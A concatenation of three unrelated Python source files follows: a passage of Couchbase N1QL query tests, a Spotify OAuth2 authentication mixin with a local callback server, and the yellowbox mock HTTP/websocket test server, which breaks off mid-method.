actual_result, expected_result = self.run_query_from_template(query_template)
if self.monitoring:
e.set()
t4.join(100)
self._verify_results(actual_result['results'], expected_result)
query_template = 'SELECT DISTINCT $str0 FROM %s ORDER BY $str0 LIMIT 10 OFFSET 10' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
def test_limit_offset_zero(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT DISTINCT $str0 FROM %s ORDER BY $str0 LIMIT 0' % (bucket.name)
self.query = self.gen_results.generate_query(query_template)
actual_result = self.run_cbq_query()
self.assertEqual(actual_result['results'], [],
"Results are incorrect.Actual %s.\n Expected: %s.\n" % (
actual_result['results'], []))
query_template = 'SELECT DISTINCT $str0 FROM %s ORDER BY $str0 LIMIT 10 OFFSET 0' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self.assertEqual(actual_result['results'], expected_result,
"Results are incorrect.Actual %s.\n Expected: %s.\n" % (
actual_result['results'], expected_result))
def test_limit_offset_negative_check(self):
queries_errors = {'SELECT DISTINCT $str0 FROM {0} LIMIT 1.1' :
'Invalid LIMIT value 1.1',
'SELECT DISTINCT $str0 FROM {0} OFFSET 1.1' :
'Invalid OFFSET value 1.1'}
self.negative_common_body(queries_errors)
def test_limit_offset_sp_char_check(self):
queries_errors = {'SELECT DISTINCT $str0 FROM {0} LIMIT ~' :
'syntax erro',
'SELECT DISTINCT $str0 FROM {0} OFFSET ~' :
'syntax erro'}
self.negative_common_body(queries_errors)
##############################################################################################
#
# ALIAS CHECKS
##############################################################################################
def test_simple_alias(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
if self.monitoring:
e = threading.Event()
t5 = threading.Thread(name='run_limit_offset', target=self.run_active_requests, args=(e, 2))
t5.start()
query_template = 'SELECT COUNT($str0) AS COUNT_EMPLOYEE FROM %s' % (bucket.name)
if self.analytics:
query_template = 'SELECT COUNT(`$str0`) AS COUNT_EMPLOYEE FROM %s' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self.assertEqual(actual_result['results'], expected_result,
"Results are incorrect.Actual %s.\n Expected: %s.\n" % (
actual_result['results'], expected_result))
query_template = 'SELECT COUNT(*) + 1 AS COUNT_EMPLOYEE FROM %s' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
if self.monitoring:
e.set()
t5.join(100)
expected_result = [ { "COUNT_EMPLOYEE": expected_result[0]['COUNT_EMPLOYEE'] + 1 } ]
self.assertEqual(actual_result['results'], expected_result,
"Results are incorrect.Actual %s.\n Expected: %s.\n" % (
actual_result['results'], expected_result))
def test_simple_negative_alias(self):
queries_errors = {'SELECT $str0._last_name as *' : 'syntax error',
'SELECT $str0._last_name as DATABASE ?' : 'syntax error',
'SELECT $str0 AS NULL FROM {0}' : 'syntax error',
'SELECT $str1 as $str0, $str0 FROM {0}' :
'Duplicate result alias name'}
if self.does_test_meet_server_version(6, 5, 0):
queries_errors['SELECT test.$obj0 as points FROM {0} AS TEST ' +
'GROUP BY $obj0 AS GROUP_POINT'] = 'must depend only on group keys or aggregates'
self.negative_common_body(queries_errors)
def test_alias_from_clause(self):
self.fail_if_no_buckets()
queries_templates = ['SELECT $obj0.$_obj0_int0 AS points FROM %s AS test ORDER BY points',
'SELECT $obj0.$_obj0_int0 AS points FROM %s AS test WHERE test.$int0 >0' +\
' ORDER BY points',
'SELECT $obj0.$_obj0_int0 AS points FROM %s AS test ' +\
'GROUP BY test.$obj0.$_obj0_int0 ORDER BY points']
# if self.analytics:
# queries_templates = ['SELECT test.$obj0.$_obj0_int0 AS points FROM %s AS test ORDER BY test.points',
# 'SELECT test.$obj0.$_obj0_int0 AS points FROM %s AS test WHERE test.$int0 >0' +\
# ' ORDER BY test.points',
# 'SELECT test.$obj0.$_obj0_int0 AS points FROM %s AS test ' +\
# 'GROUP BY test.$obj0.$_obj0_int0 ORDER BY test.points']
for bucket in self.buckets:
if self.monitoring:
e = threading.Event()
t6 = threading.Thread(name='run_limit_offset', target=self.run_active_requests, args=(e, 2))
t6.start()
for query_template in queries_templates:
actual_result, expected_result = self.run_query_from_template(query_template % (bucket.name))
if self.monitoring:
e.set()
t6.join(100)
self._verify_results(actual_result['results'], expected_result)
def test_alias_from_clause_group(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $obj0.$_obj0_int0 AS points FROM %s AS test ' %(bucket.name) +\
'GROUP BY $obj0.$_obj0_int0 ORDER BY points'
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
def test_alias_order_desc(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
if self.monitoring:
e = threading.Event()
t7 = threading.Thread(name='run_limit_offset', target=self.run_active_requests, args=(e, 2))
t7.start()
query_template = 'SELECT $str0 AS name_new FROM %s AS test ORDER BY name_new DESC' %(
bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
if self.monitoring:
e.set()
t7.join(100)
self._verify_results(actual_result['results'], expected_result)
def test_alias_order_asc(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $str0 AS name_new FROM %s AS test ORDER BY name_new ASC' %(
bucket.name)
if self.analytics:
query_template = 'SELECT `$str0` AS name_new FROM %s AS test ORDER BY name_new ASC' %(
bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
def test_alias_aggr_fn(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
if self.monitoring:
e = threading.Event()
t8 = threading.Thread(name='run_limit_offset', target=self.run_active_requests, args=(e, 2))
t8.start()
query_template = 'SELECT COUNT(TEST.$str0) from %s AS TEST' %(bucket.name)
if self.analytics:
query_template = 'SELECT COUNT(TEST.`$str0`) from %s AS TEST' %(bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
if self.monitoring:
e.set()
t8.join(100)
self._verify_results(actual_result['results'], expected_result)
def test_alias_unnest(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT count(skill) FROM %s AS emp UNNEST emp.$list_str0 AS skill' %(
bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
query_template = 'SELECT count(skill) FROM %s AS emp UNNEST emp.$list_str0 skill' %(
bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
##############################################################################################
#
# ORDER BY CHECKS
##############################################################################################
def test_order_by_check(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $str0, $str1, $obj0.$_obj0_int0 points FROM %s' % (bucket.name) +\
' ORDER BY $str1, $str0, $obj0.$_obj0_int0'
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
query_template = 'SELECT $str0, $str1 FROM %s' % (bucket.name) +\
' ORDER BY $obj0.$_obj0_int0, $str0, $str1'
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
def test_order_by_alias(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $str1, $obj0 AS points FROM %s' % (bucket.name) +\
' AS test ORDER BY $str1 DESC, points DESC'
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
def test_order_by_alias_arrays(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $str1, $obj0, $list_str0[0] AS SKILL FROM %s' % (
bucket.name) +\
' AS TEST ORDER BY SKILL, $str1, TEST.$obj0'
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
def test_order_by_alias_aggr_fn(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $int0, $int1, count(*) AS emp_per_month from %s'% (
bucket.name) +\
' WHERE $int1 >7 GROUP BY $int0, $int1 ORDER BY emp_per_month, $int1, $int0'
actual_result, expected_result = self.run_query_from_template(query_template)
#self.assertTrue(len(actual_result['results'])== 0)
def test_order_by_aggr_fn(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $str1 AS TITLE, min($int1) day FROM %s GROUP' % (bucket.name) +\
' BY $str1 ORDER BY MIN($int1), $str1'
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
if self.analytics:
self.query = 'SELECT d.email AS TITLE, min(d.join_day) day FROM %s d GROUP' % (bucket.name) +\
' BY d.$str1 ORDER BY MIN(d.join_day), d.$str1'
actual_result1 = self.run_cbq_query()
self._verify_results(actual_result1['results'], actual_result['results'])
def test_order_by_precedence(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $str0, $str1 FROM %s' % (bucket.name) +\
' ORDER BY $str0, $str1'
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
query_template = 'SELECT $str0, $str1 FROM %s' % (bucket.name) +\
' ORDER BY $str1, $str0'
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
def test_order_by_satisfy(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $str0, $list_obj0 FROM %s AS employee ' % (bucket.name) +\
'WHERE ANY vm IN employee.$list_obj0 SATISFIES vm.$_list_obj0_int0 > 5 AND' +\
' vm.$_list_obj0_str0 = "ubuntu" END ORDER BY $str0, $list_obj0[0].$_list_obj0_int0'
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
##############################################################################################
#
# DISTINCT
##############################################################################################
def test_distinct(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT DISTINCT $str1 FROM %s ORDER BY $str1' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
def test_distinct_nested(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT DISTINCT $obj0.$_obj0_int0 as VAR FROM %s ' % (bucket.name) +\
'ORDER BY $obj0.$_obj0_int0'
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
query_template = 'SELECT DISTINCT $list_str0[0] as skill' +\
' FROM %s ORDER BY $list_str0[0]' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
self.query = 'SELECT DISTINCT $obj0.* FROM %s' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
##############################################################################################
#
# COMPLEX PATHS
##############################################################################################
#Not used anywhere
def test_simple_complex_paths(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $_obj0_int0 FROM %s.$obj0' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
#Not used anywhere
def test_alias_complex_paths(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $_obj0_int0 as new_attribute FROM %s.$obj0' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
#Not used anywhere
def test_where_complex_paths(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $_obj0_int0 FROM %s.$obj0 WHERE $_obj0_int0 = 1' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
def test_new_contains_functions(self):
self.query = 'SELECT * FROM default WHERE ANY v IN tokens(default, {"specials":true}) SATISFIES REGEXP_LIKE(TOSTRING(v),"(\d{3}-\d{2}-\d{4})|\d{9)|(\d{3}[ ]\d{2}[ ]\d{4})")END order by meta().id'
expected_result = self.run_cbq_query()
self.query = 'SELECT * FROM default WHERE CONTAINS_TOKEN_REGEXP(TOSTRING(v),"(\d{3}-\\d{2}-\\d{4})|(\\b\\d{9}\\b)|(\\d{3}[ ]\\d{2}[ ]\\d{4})") order by meta().id'
actual_result = self.run_cbq_query()
self.assertEqual(actual_result['results'], expected_result['results'])
self.query = 'SELECT * FROM default WHERE CONTAINS_TOKEN_REGEXP(TOSTRING(v),"(\d{3}-\d{2}-\d{4})|\d{9)|(\d{3}[ ]\d{2}[ ]\d{4})") order by meta().id'
actual_result = self.run_cbq_query()
self.assertEqual(actual_result['results'], expected_result['results'])
|
auth.py
|
import socket
import threading
import uuid
from pathlib import Path
from wsgiref.simple_server import make_server
import hug
from cachecontrol import CacheControlAdapter
from cachecontrol.caches.file_cache import FileCache
from oauthlib.oauth2 import BackendApplicationClient
from pony.orm import get
from requests_oauthlib import OAuth2Session
from .. import config, logger, root
from ..cache import User, db_session, select
from ..constants import API, AllScopes, AuthFlow
from ..exceptions import SpotifyCredentialsException
AUTH_HTML_FILE = root / "html" / "auth_message.html"
CACHE_FILE = Path.home() / ".cache" / "spfy" / ".web_cache"
class AuthMixin:
def __init__(
self,
*args,
client_id=None,
client_secret=None,
redirect_uri=None,
user_id=None,
username=None,
**kwargs,
):
super().__init__(*args, **kwargs)
self.client_id = client_id or config.app.client_id
self.client_secret = client_secret or config.app.client_secret
self.redirect_uri = self._get_redirect_uri(redirect_uri)
self.user_id = user_id
self.username = username
self.callback_reached = threading.Event()
self.flow = None
self.session = None
@staticmethod
def _get_redirect_uri(redirect_uri):
redirect_uri = (
redirect_uri
or config.app.redirect_uri
or f"http://{socket.gethostname()}.local"
)
if config.auth.callback.enabled and config.auth.callback.port and redirect_uri:
redirect_uri += f":{config.auth.callback.port}"
return redirect_uri
@staticmethod
def get_session(*args, **kwargs):
session = OAuth2Session(*args, **kwargs)
cache_adapter = CacheControlAdapter(
cache=FileCache(CACHE_FILE),
pool_connections=config.http.connections,
pool_maxsize=config.http.connections,
max_retries=config.http.retries,
)
session.mount("http://", cache_adapter)
return session
@property
@db_session
def user(self):
return User[self.user_id]
@property
def is_authenticated(self):
return bool(self.session and self.session.authorized)
@db_session
def authenticate_user(
self,
username=None,
email=None,
code=None,
state=None,
auth_response=None,
scope=AllScopes,
):
self.flow = AuthFlow.AUTHORIZATION_CODE
session = self.session or self.get_session(
self.client_id,
redirect_uri=self.redirect_uri,
scope=scope,
auto_refresh_url=API.TOKEN.value,
)
if self.user_id:
user = User.get(id=self.user_id)
if user and user.token:
session.token = user.token
session.token_updater = User.token_updater(user.id)
return session
if username or email:
user = get(u for u in User if u.username == username or u.email == email)
if user:
self.user_id = user.id
self.username = user.username
session.token = user.token
session.token_updater = User.token_updater(user.id)
return session
if code or auth_response:
token = session.fetch_token(
token_url=API.TOKEN.value,
client_id=self.client_id,
client_secret=self.client_secret,
code=code,
state=state,
authorization_response=auth_response,
)
user_details = self.current_user()
user = (
select(
u
for u in User
if u.username == user_details.id or u.email == user_details.email
)
.for_update()
.get()
)
if user:
user.token = token
if user.id != self.user_id:
self.user_id = user.id
self.username = user.username
elif self.user_id:
user = User.get_for_update(id=self.user_id)
if user:
user.token = token
if not user:
self.user_id = self.user_id or uuid.uuid4()
user_details["user_id"] = self.user_id
user_details["token"] = token
user = User.from_dict(user_details)
self.username = user.username
return session
return session
@db_session
def authenticate_server(self):
self.flow = AuthFlow.CLIENT_CREDENTIALS
default_user = User.default()
self.user_id = default_user.id
self.username = default_user.username
session = self.session or self.get_session(
client=BackendApplicationClient(self.client_id)
)
session.token_updater = User.token_updater(default_user.id)
if default_user.token:
session.token = default_user.token
else:
default_user.token = session.fetch_token(
token_url=API.TOKEN.value,
client_id=self.client_id,
client_secret=self.client_secret,
)
return session
def authenticate(self, flow=config.auth.flow, **auth_params):
if not (self.client_id and self.client_secret):
raise SpotifyCredentialsException
self.flow = AuthFlow(flow)
if self.flow == AuthFlow.CLIENT_CREDENTIALS:
self.session = self.authenticate_server()
elif self.flow == AuthFlow.AUTHORIZATION_CODE:
self.session = self.authenticate_user(**auth_params)
if not self.session.token:
if config.auth.callback.enabled:
self.start_callback()
authorization_url, _ = self.session.authorization_url(
API.AUTHORIZE.value
)
if config.auth.send_auth_url_to_email:
email = auth_params.get("email") or config.auth.email
self.send_auth_email(email, authorization_url)
else:
print(f"Login here: {authorization_url}")
self.wait_for_authorization()
def wait_for_authorization(self):
if not config.auth.callback.enabled:
url = input("Paste the URL you are redirected to:")
self.session = self.authenticate_user(auth_response=url)
else:
self.callback_reached.wait(config.auth.callback.timeout)
self.stop_callback()
def stop_callback(self):
if self.httpd:
self.httpd.shutdown()
def start_callback(self):
self.callback_reached.clear()
# pylint: disable=unused-variable
@hug.get("/", output=hug.output_format.html)
def callback(code: hug.types.text, state: hug.types.text):
html = AUTH_HTML_FILE.read_text() # pylint: disable=no-member
try:
self.session = self.authenticate_user(code=code, state=state)
html = html.replace("SPOTIFY_AUTH_MESSAGE", "Successfully logged in!")
html = html.replace("BACKGROUND_COLOR", "#65D46E")
except Exception as exc:
logger.exception(exc)
html = html.replace(
"SPOTIFY_AUTH_MESSAGE", "Could not get authorization token."
)
html = html.replace("BACKGROUND_COLOR", "#EC2E50")
finally:
self.callback_reached.set()
return html
api = __hug__.http.server(None) # pylint: disable=undefined-variable
self.httpd = make_server("", config.auth.callback.port, api)
threading.Thread(target=self.httpd.serve_forever, daemon=True).start()
|
webserver.py
|
from __future__ import annotations
from contextlib import contextmanager
from copy import deepcopy
from functools import partial
from threading import Lock, Thread
from time import sleep
from typing import Awaitable, Callable, ContextManager, Iterable, Iterator, List, Optional, Tuple, Union, overload
from requests import ConnectionError, HTTPError, get
from starlette.applications import Starlette
from starlette.requests import Request
from starlette.responses import PlainTextResponse, Response
from starlette.routing import BaseRoute, Route, WebSocketRoute
from starlette.status import HTTP_500_INTERNAL_SERVER_ERROR, WS_1011_INTERNAL_ERROR
from starlette.websockets import WebSocket
from uvicorn import Config, Server
from uvicorn.config import LOGGING_CONFIG
from yellowbox import YellowService
from yellowbox.extras.webserver.http_request_capture import RecordedHTTPRequest, RecordedHTTPRequests
from yellowbox.extras.webserver.util import mute_uvicorn_log
from yellowbox.extras.webserver.ws_request_capture import RecordedWSTranscripts, recorder_websocket_endpoint
from yellowbox.retry import RetrySpec
from yellowbox.utils import docker_host_name
class HandlerError(Exception):
"""
An exception occurred while handling an endpoint in the webserver thread
"""
HTTP_SIDE_EFFECT = Union[Response, Callable[[Request], Awaitable[Response]]]
WS_SIDE_EFFECT = Callable[[WebSocket], Awaitable[Optional[int]]]
METHODS = Union[str, Iterable[str]]
class EndpointPatch(ContextManager):
"""
A the return value of endpoint side effect patches, restores the original side effect if ever exited
"""
def __init__(self, endpoint: Union[MockHTTPEndpoint, MockWSEndpoint], restore_side_effect):
self.endpoint = endpoint
self.restore_side_effect = restore_side_effect
def __exit__(self, exc_type, exc_val, exc_tb):
self.endpoint.side_effect = self.restore_side_effect
self.endpoint.owner._raise_from_pending()
class MockHTTPEndpoint:
"""
A mock http endpoint for a webserver
"""
def __init__(self, name: str, methods: METHODS, rule_string: str, side_effect: HTTP_SIDE_EFFECT,
auto_read_body: bool = True, forbid_implicit_head_verb: bool = True):
"""
Args:
name: the name of the endpoint
methods: the methods by which the endpoint is accessible
rule_string: the rule-string of the endpoint, as specified by starlette routes
side_effect: the side effect of the endpoint. This can be either a starlette response, or an async callable
that accepts a starlette request and returns a starlette response.
auto_read_body: If true (the default), the request is always awaited to be received in full before replying
to the client.
forbid_implicit_head_verb: By default, starlette automatically makes all routes that are accessible by the
GET method also accessible through the HEAD method. If this parameter is set to true (the default),
this behaviour is disabled and HEAD must be added explicitly if required.
"""
self._request_captures: List[RecordedHTTPRequests] = []
self.owner: Optional[WebServer] = None
if isinstance(methods, str):
methods = (methods,)
self.methods: Tuple[str, ...] = tuple(m.upper() for m in methods)
self.rule_string = rule_string
self.__name__ = name
self.side_effect = side_effect
self.auto_read_body = auto_read_body
self.forbid_implicit_head_verb = forbid_implicit_head_verb
def patch(self, side_effect: HTTP_SIDE_EFFECT):
"""
Change the side effect of the endpoint
Args:
side_effect: the new side effect of the endpoint
Returns:
A context manager that, if exited, restores the endpoint's original side effect
"""
self.owner._raise_from_pending()
previous_side_effect = self.side_effect
self.side_effect = side_effect
return EndpointPatch(self, previous_side_effect)
@contextmanager
def capture_calls(self) -> Iterator[RecordedHTTPRequests]:
"""
A context manager that records all requests to the endpoint in its scope to a list
Returns:
A RecordedHTTPRequests to which the requests are recorded
"""
self.owner._raise_from_pending()
if not self.auto_read_body:
raise RuntimeError("cannot capture calls if auto_read_body is disabled")
calls = RecordedHTTPRequests()
self._request_captures.append(calls)
try:
yield calls
finally:
if self._request_captures[-1] is not calls:
raise RuntimeError('capture_calls contexts cannot be used in parallel')
self._request_captures.pop()
self.owner._raise_from_pending()
async def get(self, request: Request):
# the target of the starlette route
if not self.owner:
raise RuntimeError('endpoint must be assigned to a webserver')
if self.owner._pending_exception:
return PlainTextResponse(
f'an exception in the webserver had previously occurred: {self.owner._pending_exception!r}',
status_code=HTTP_500_INTERNAL_SERVER_ERROR
)
try:
if isinstance(self.side_effect, Response):
ret = self.side_effect
else:
ret = await self.side_effect(request)
except Exception as ex:
self.owner._pending_exception = ex
return PlainTextResponse(f'handler raised an exception: {ex!r}', status_code=HTTP_500_INTERNAL_SERVER_ERROR)
else:
if self.auto_read_body:
await request.body()
if self._request_captures: # recording the request reads its body, which we might not want
recorded = await RecordedHTTPRequest.from_request(request)
for c in self._request_captures:
c.append(recorded)
return ret
def route(self) -> BaseRoute:
"""
Returns: a starlette route representing the endpoint
"""
ret = Route(self.rule_string, self.get, methods=self.methods, name=self.__name__) # type:ignore[arg-type]
if self.forbid_implicit_head_verb and 'HEAD' not in self.methods:
ret.methods.discard('HEAD')
return ret
@overload
def http_endpoint(methods: METHODS, rule_string: str, *, auto_read_body: bool = True, forbid_head_verb: bool = True) \
-> Callable[[HTTP_SIDE_EFFECT], MockHTTPEndpoint]: ...
@overload
def http_endpoint(methods: METHODS, rule_string: str, side_effect: HTTP_SIDE_EFFECT, *, auto_read_body: bool = True,
forbid_implicit_head_verb: bool = True) -> MockHTTPEndpoint: ...
def http_endpoint(methods: METHODS, rule_string: str, side_effect: Optional[HTTP_SIDE_EFFECT] = None, **kwargs):
"""
Create a mock HTTP endpoint.
Args:
methods: forwarded to MockHTTPEndpoint
rule_string: forwarded to MockHTTPEndpoint
side_effect: forwarded to MockHTTPEndpoint
**kwargs: forwarded to MockHTTPEndpoint
Returns:
an http endpoint
Notes:
can also be used as a decorator, when decorating the side effect
Examples:
>>> @http_endpoint('GET', '/bar')
... async def bar(request: Request):
... return PlainTextResponse(int(request.query_params['x'])**2)
...
... WebServer().add_http_endpoint(bar)
"""
def ret(func: HTTP_SIDE_EFFECT):
try:
name = func.__name__ # type: ignore[union-attr]
except AttributeError:
name = f'{methods} {rule_string}'
return MockHTTPEndpoint(name, methods, rule_string, func, **kwargs)
if side_effect is None:
return ret
return ret(side_effect)
class MockWSEndpoint:
"""
A mock websocket endpoint for a webserver
"""
def __init__(self, name: str, rule_string: str, side_effect: WS_SIDE_EFFECT):
"""
Args:
name: the name of the endpoint
rule_string: the rule-string of the endpoint, as specified by starlette routes
side_effect: the side effect of the endpoint. This should be an async callable that accepts a starlette
websocket and optionally returns an int to close the connection with that code.
"""
self._request_captures: List[RecordedWSTranscripts] = []
self.owner: Optional[WebServer] = None
self.rule_string = rule_string
self.__name__ = name
self.side_effect = side_effect
# this will be the endpoint handed to the starlette.WebSocketRoute.
# the route chooses whether to hand off the scope, receive, send functions (which we need) only if we fail
# inspect.isfunction and inspect.ismethod. Fortunately, partial fails these tests. By storing it as an
# attribute of the endpoint, we will be able to better locate routes relating to the endpoint
self.endpoint = partial(recorder_websocket_endpoint, function=self.get, sinks=self._request_captures)
async def get(self, websocket: WebSocket):
# this will be the function that our endpoint will eventually route to
if not self.owner:
await websocket.close(WS_1011_INTERNAL_ERROR) # note that this will actually send a 403 code :shrug:
return
if self.owner._pending_exception:
await websocket.close(WS_1011_INTERNAL_ERROR) # note that this will actually send a 403 code :shrug:
return
try:
code = await self.side_effect(websocket)
except Exception as ex:
self.owner._pending_exception = ex
await websocket.close(WS_1011_INTERNAL_ERROR)
else:
if code is not None:
await websocket.close(code)
def patch(self, side_effect: WS_SIDE_EFFECT):
"""
Change the side effect of the endpoint
Args:
side_effect: the new side effect of the endpoint
Returns:
A context manager that, if exited, restores the endpoint's original side effect
"""
self.owner._raise_from_pending()
previous_side_effect = self.side_effect
self.side_effect = side_effect
return EndpointPatch(self, previous_side_effect)
@contextmanager
def capture_calls(self) -> Iterator[RecordedWSTranscripts]:
self.owner._raise_from_pending()
calls = RecordedWSTranscripts()
self._request_captures.append(calls)
try:
yield calls
finally:
if self._request_captures[-1] is not calls:
raise RuntimeError('capture_calls contexts cannot be used in parallel')
self._request_captures.pop()
self.owner._raise_from_pending()
@overload
def ws_endpoint(rule_string: str) -> Callable[[WS_SIDE_EFFECT], MockWSEndpoint]: pass
@overload
def ws_endpoint(rule_string: str, side_effect: WS_SIDE_EFFECT) -> MockWSEndpoint: pass
def ws_endpoint(rule_string: str, side_effect: Optional[WS_SIDE_EFFECT] = None):
"""
Create a mock websocket endpoint.
Args:
rule_string: forwarded to MockWSEndpoint
side_effect: forwarded to MockWSEndpoint
Returns:
a websocket endpoint
Notes:
can also be used as a decorator, when decorating the side effect
Examples:
>>> @ws_endpoint('/square')
... async def square(ws: WebSocket):
... await ws.accept()
... x = int(await ws.receive_text())
... await ws.send_text(str(x*x))
... await ws.close()
...
... WebServer().add_ws_endpoint(square)
"""
def ret(func: WS_SIDE_EFFECT):
return MockWSEndpoint(func.__name__, rule_string, func)
if side_effect is None:
return ret
return ret(side_effect)
DEFAULT_LOG_CONFIG = deepcopy(LOGGING_CONFIG)
class WebServer(YellowService):
"""
An easy-to-modify HTTP and websocket server, wrapping a starlette application
"""
PORT_ACCESS_MAX_RETRIES = 100 # the maximum number of attempts to make when accessing a binding port. Each attempt
# has an interval of 0.01 seconds
def __init__(self, name: str, port: Optional[int] = None, log_config=DEFAULT_LOG_CONFIG, **kwargs):
"""
Args:
name: the name of the service
port: the port to bind to when serving, default will bind to an available port
log_config: the logging configuration fot the uvicorn server. On default, will override the access format
to include the service name.
**kwargs: forwarded to the uvicorn configuration.
"""
self._app = Starlette(debug=True)
self._route_lock = Lock()
# since the main thread won't catch errors in handlers, this class will store any error raised while handling,
# and raise them in the main thread as soon as we can
self._pending_exception: Optional[Exception] = None
if log_config is DEFAULT_LOG_CONFIG:
log_config = deepcopy(DEFAULT_LOG_CONFIG)
log_config['formatters']['access']['fmt'] = f'%(levelprefix)s {name} - "%(request_line)s" %(status_code)s'
self._port = port
config = Config(self._app, **kwargs, port=self._port, log_config=log_config)
self._server = Server(config)
self._serve_thread = Thread(name=f'{name}_thread', target=self._server.run)
@property
def port(self) -> Optional[int]:
"""
Returns:
The port the service is bound to, if the service is binding to anything.
Notes:
Will only return None if the port was not provided during construction and the service thread is not running
If the service is starting up, this property will block until the port is binded, or raise an error if
blocked for longer than 1 second.
"""
if self._port or not self._serve_thread.is_alive():
return self._port
for _ in range(self.PORT_ACCESS_MAX_RETRIES):
servers = getattr(self._server, 'servers', None)
if servers:
sockets = getattr(servers[0], 'sockets', None)
if sockets:
socket = sockets[0]
break
sleep(0.01)
else:
raise RuntimeError('timed out when getting binding port')
self._port = socket.getsockname()[1]
return self._port
@overload
def add_http_endpoint(self, endpoint: MockHTTPEndpoint) -> MockHTTPEndpoint:
...
@overload
def add_http_endpoint(self, methods: METHODS, rule_string: str, side_effect: HTTP_SIDE_EFFECT, *,
auto_read_body: bool = True, forbid_implicit_head_verb: bool = True) -> MockHTTPEndpoint:
...
def add_http_endpoint(self, *args, **kwargs) -> MockHTTPEndpoint:
"""
Add an http endpoint to the server
Args:
*args: either a single mock http endpoint, or parameters forwarded to http_endpoint construct one
**kwargs: forwarded to http_endpoint to construct an endpoint
Returns:
the http endpoint added to the server
"""
self._raise_from_pending()
if len(args) == 1 and not kwargs:
ep, = args
else:
ep = http_endpoint(*args, **kwargs)
if ep.owner is not None:
raise RuntimeError('an endpoint cannot be added twice')
with self._route_lock:
self._app.routes.append(
ep.route()
)
ep.owner = self
return ep
def remove_http_endpoint(self, endpoint: MockHTTPEndpoint):
"""
Remove an http endpoint previously added to the server
Args:
endpoint: the endpoint to remove
"""
self._raise_from_pending()
if endpoint.owner is not self:
raise RuntimeError('endpoint is not added to the server')
with self._route_lock:
for i, route in enumerate(self._app.router.routes):
if isinstance(route, Route) and route.endpoint == endpoint.get:
break
else:
raise RuntimeError('endpoint is not found in the server')
self._app.router.routes.pop(i)
endpoint.owner = None
@overload
def patch_http_endpoint(self, endpoint: MockHTTPEndpoint) -> ContextManager[MockHTTPEndpoint]:
...
@overload
def patch_http_endpoint(self, methods: METHODS, rule_string: str, side_effect: HTTP_SIDE_EFFECT, *,
auto_read_body: bool = True, forbid_head_verb: bool = True) \
-> ContextManager[MockHTTPEndpoint]:
...
@contextmanager # type:ignore[misc]
def patch_http_endpoint(self, *args, **kwargs) -> Iterator[MockHTTPEndpoint]:
"""
A context manager to add and then remove an http endpoint
Args:
*args: forwarded to self.add_http_endpoint
**kwargs: forwarded to self.add_http_endpoint
Returns:
The temporarily added endpoint
"""
ep = self.add_http_endpoint(*args, **kwargs)
try:
yield ep
finally:
self.remove_http_endpoint(ep)
@overload
def add_ws_endpoint(self, endpoint: MockWSEndpoint) -> MockWSEndpoint:
...
@overload
def add_ws_endpoint(self, rule_string: str, side_effect: WS_SIDE_EFFECT) -> MockWSEndpoint:
...
def add_ws_endpoint(self, *args, **kwargs):
"""
Add a websocket endpoint to the server
Args:
*args: either a single mock ws endpoint, or parameters forwarded to ws_endpoint construct one
**kwargs: forwarded to ws_endpoint to construct an endpoint
Returns:
the websocket endpoint added to the server
"""
self._raise_from_pending()
